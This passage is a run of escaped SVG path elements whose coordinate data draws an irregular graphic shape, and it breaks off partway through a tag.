d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n <path 